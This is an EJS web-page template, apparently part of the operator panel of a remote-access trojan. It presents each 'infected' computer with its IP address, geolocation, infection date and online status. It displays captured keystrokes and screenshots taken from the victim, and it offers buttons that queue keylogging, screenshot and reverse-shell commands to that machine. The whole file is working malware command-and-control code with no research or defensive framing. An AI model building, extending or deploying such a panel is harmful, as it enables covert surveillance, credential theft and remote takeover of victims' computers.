<%- include('../partials/header'); %>
    <%- include('../partials/navbar'); %>

    <div class="container-fluid">
        <h3 class="text-center"><%= single_client.computerName %> (<%= single_client.uuid %>)
            <span id="status" class="badge badge-pill badge-danger">Unreachable</span>
        </h3>
        

        <%
            const yearUpdate = single_client.updatedAt.getFullYear()
            const monthUpdate = (single_client.updatedAt.getMonth() <= 9 ? '0' : '') + (single_client.updatedAt.getMonth() + 1)
            const dayUpdate = (single_client.updatedAt.getDate() <= 9 ? '0' : '') + single_client.updatedAt.getDate()
            const hoursUpdate = (single_client.updatedAt.getHours() <= 9 ? '0' : '') + (single_client.updatedAt.getHours())
            const minutesUpdate = (single_client.updatedAt.getMinutes() <= 9 ? '0' : '') + (single_client.updatedAt.getMinutes()) 
            const clientUpdateDate = yearUpdate + '-' + monthUpdate + '-' + dayUpdate + ' ' + hoursUpdate + ':' + minutesUpdate

            const yearInfection = single_client.createdAt.getFullYear()
            const monthInfection = (single_client.createdAt.getMonth() <= 9 ? '0' : '') + (single_client.createdAt.getMonth() + 1)
            const dayInfection = (single_client.createdAt.getDate() <= 9 ? '0' : '') + single_client.createdAt.getDate()
            const hoursInfection = (single_client.createdAt.getHours() <= 9 ? '0' : '') + (single_client.createdAt.getHours())
            const minutesInfection = (single_client.createdAt.getMinutes() <= 9 ? '0' : '') + (single_client.createdAt.getMinutes()) 
            const clientInfectionDate = yearInfection + '-' + monthInfection + '-' + dayInfection + ' ' + hoursInfection + ':' + minutesInfection
        %>

        <div class="card">
            <div class="card-body">
                <div class="row justify-content-around align-items-center">
                    <div id="countryFlag" class="col-1">
                    </div>
                    <div class="col-3">
                        <div>
                            Computer Name : <%= single_client.computerName %>
                        </div>
                        <div>
                            IP Address : <%= ipAddress %>
                        </div>
                        <div>
                            Date Infection : <%= clientInfectionDate %>
                        </div>
                        <div>
                            Last Update : <%= clientUpdateDate %>
                        </div>
                    </div>
                    
                    <div class="col-3">
                        <div>
                            Country : <span id="country"></span>
                        </div>
                        <div>
                            City / Zip Code : <span id="city"></span>
                        </div>
                        <div>
                            Latitude / Longitude : <span id="latlong"></span>
                        </div>
                        <div>
                            FAI : <span id="fai"></span>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="d-grid gap-2 d-md-flex justify-content-around mt-4">
            <button class="btn btn-secondary btn-command" type="button" data-uuid="<%= single_client.uuid %>" data-command="keylogs">Keylogs</button>
            <button class="btn btn-secondary btn-command" type="button" data-uuid="<%= single_client.uuid %>" data-command="screenshot">Screenshot</button>
            <button class="btn btn-secondary btn-command" type="button" data-uuid="<%= single_client.uuid %>" data-command="reverse-shell">Reverse Shell</button>
        </div>
        <div id="commandSent" class="text-center mt-2">
            <div class="btn btn-success">
                Command successfully added to the queue !
            </div>
        </div>

        <div id="victim-card-container" class="mb-5">
            <div class="card h-50 mt-5">
                <div class="card-header font-weight-bold">Logs</div>
                <div class="card-body table-responsive">
                    <table class="table table-striped table-hover table-light">
                        <thead class="thead-dark">
                            <tr class="d-flex">
                                <th scope="col" class="col-1">ID</th>
                                <th scope="col" class="col-3">Application Name</th>
                                <th scope="col" class="col-4">Logs</th>
                                <th scope="col" class="col-2">Date</th>
                                <th scope="col" class="col-2">Binary (Path)</th>
                            </tr>
                        </thead>
                        <tbody>
                            <% for (let k in keylogs ) { 
                                const yearLog = keylogs[k].datetime.getFullYear()
                                const monthLog = (keylogs[k].datetime.getMonth() <= 9 ? '0' : '') + (keylogs[k].datetime.getMonth() + 1)
                                const dayLog = (keylogs[k].datetime.getDate() <= 9 ? '0' : '') + keylogs[k].datetime.getDate()
                                const hoursLog = (keylogs[k].datetime.getHours() <= 9 ? '0' : '') + (keylogs[k].datetime.getHours())
                                const minutesLog = (keylogs[k].datetime.getMinutes() <= 9 ? '0' : '') + (keylogs[k].datetime.getMinutes()) 
                                const logDate = yearLog + '-' + monthLog + '-' + dayLog + ' ' + hoursLog + ':' + minutesLog

                                const binary = keylogs[k].path.split('\\')[keylogs[k].path.split('\\').length - 1]
                            %>
                                <tr class="d-flex">
                                    <th scope="row" class="col-1"><%= keylogs[k].id %></th>
                                    <td class="col-3"><%= keylogs[k].application %></td>
                                    <td class="col-4"><%= keylogs[k].logs %></td>
                                    <td class="col-2"><%= logDate %></td>
                                    <td class="col-2" data-toggle="tooltip" title="<%= keylogs[k].path %>"><%= binary %></td>
                                </tr>
                            <% } %>
                        </tbody>
                    </table>
                </div>
            </div>

            <div class="card h-50 mt-5">
                <div class="card-header font-weight-bold">Screenshots</div>
                <div class="card-body table-responsive">
                    <table class="table table-striped table-hover table-light">
                        <thead class="thead-dark">
                            <tr>
                                <th scope="col" class="col-1">ID</th>
                                <th scope="col" class="col-2">Aperçu</th>
                                <th scope="col" class="col-6">File name</th>
                                <th scope="col" class="col-3">Date</th>
                            </tr>
                        </thead>
                        <tbody>
                            <% for (let s in screenshots ) { 
                                const yearScreen = screenshots[s].createdAt.getFullYear()
                                const monthScreen = (screenshots[s].createdAt.getMonth() <= 9 ? '0' : '') + (screenshots[s].createdAt.getMonth() + 1)
                                const dayScreen = (screenshots[s].createdAt.getDate() <= 9 ? '0' : '') + screenshots[s].createdAt.getDate()
                                const hoursScreen = (screenshots[s].createdAt.getHours() <= 9 ? '0' : '') + (screenshots[s].createdAt.getHours())
                                const minutesScreen = (screenshots[s].createdAt.getMinutes() <= 9 ? '0' : '') + (screenshots[s].createdAt.getMinutes()) 
                                const screenDate = yearScreen + '-' + monthScreen + '-' + dayScreen + ' ' + hoursScreen + ':' + minutesScreen

                                const screen_name = screenshots[s].filename.split('/')[screenshots[s].filename.split('/').length - 1]
                            %>
                                <tr class="modal-screenshot" data-toggle="modal" data-target="#modal-screen-<%= screenshots[s].id %>">
                                    <th scope="row" class="col-1"><%= screenshots[s].id %></th>
                                    <td class="col-2"><img src="<%= screenshots[s].filename %>" class="img-fluid"></td>
                                    <td class="col-6"><%= screenshots[s].filename %></td>
                                    <td class="col-2"><%= screenDate %></td>
                                </tr>
                            
                                <div class="modal fade" id="modal-screen-<%= screenshots[s].id %>" tabindex="-<%= screenshots[s].id %>" aria-labelledby="modal-screenshot" aria-hidden="true">
                                    <div class="modal-dialog modal-xl modal-dialog-centered">
                                        <div class="modal-content">
                                            <div class="modal-header">
                                                <h5 class="modal-title">File name : <%= screen_name %></h5>
                                                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                                                <span aria-hidden="true">&times;</span>
                                                </button>
                                            </div>
                                            <div class="modal-body">
                                                <img src="<%= screenshots[s].filename %>" class="img-fluid">
                                                <div class="text-center font-italic mt-1">Uploaded at : <%= screenDate %></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            <% } %>
                        </tbody>
                    </table>
                </div>
            </div>
        </div>

    </div>

    <script>
        (function status() {
            const uuid = window.location.pathname.split('/')[3]
            const url = new URL(window.location.origin + '/api/clients/' + uuid + '/status')

            $.ajax({
                type: "GET",
                url: url,
            })
            .done((s) => {
                console.log("The AJAX request to get status is a success !")

                if (s === 'online') {
                    document.getElementById("status").innerText = "Online"
                    document.getElementById("status").className = "badge badge-pill badge-success"
                }
                else {
                    document.getElementById("status").innerText = "Offline"
                    document.getElementById("status").className = "badge badge-pill badge-danger"
                }
            })
            .fail(() => {
                console.log("The AJAX request to get status failed ...")
                //alert("An error occurred ...")
            })
            setTimeout(status, 1000)
        })()
    </script>

    <script>
        $(document).ready(() => {
            let ip = '<%= ipAddress %>'
            let url = 'https://ip-api.io/json/' + ip
            
            if (ip !== '') {
                
                $.ajax({
                    type: "GET",
                    url: url,
                    contentType: "application/json"
                })
                    .done((data) => {
                        console.log("The AJAX request to ip-api.io is a success !")

                        let flag = document.createElement('img')

                        flag.src = data.flagUrl
                        flag.className = 'img-fluid'
                        flag.alt = 'Flag Country'

                        $('#countryFlag').append(flag)
                        
                        $('#country').text(data.country_name + ' (' + data.country_code + ')')
                        $('#city').text((data.city == '' ? '-' : data.city)  + ' (' + (data.zip_code == '' ? '-' : data.zip_code) + ')')
                        $('#latlong').text(data.latitude + ' / ' + data.longitude)
                        $('#fai').text(data.organisation)
                    })
                    .fail(() => {
                        console.log("The AJAX request to ip-api.io failed ...")
                        alert("An error occurred ...")
                    })
            }
        })
    </script>

<%- include('../partials/footer'); %>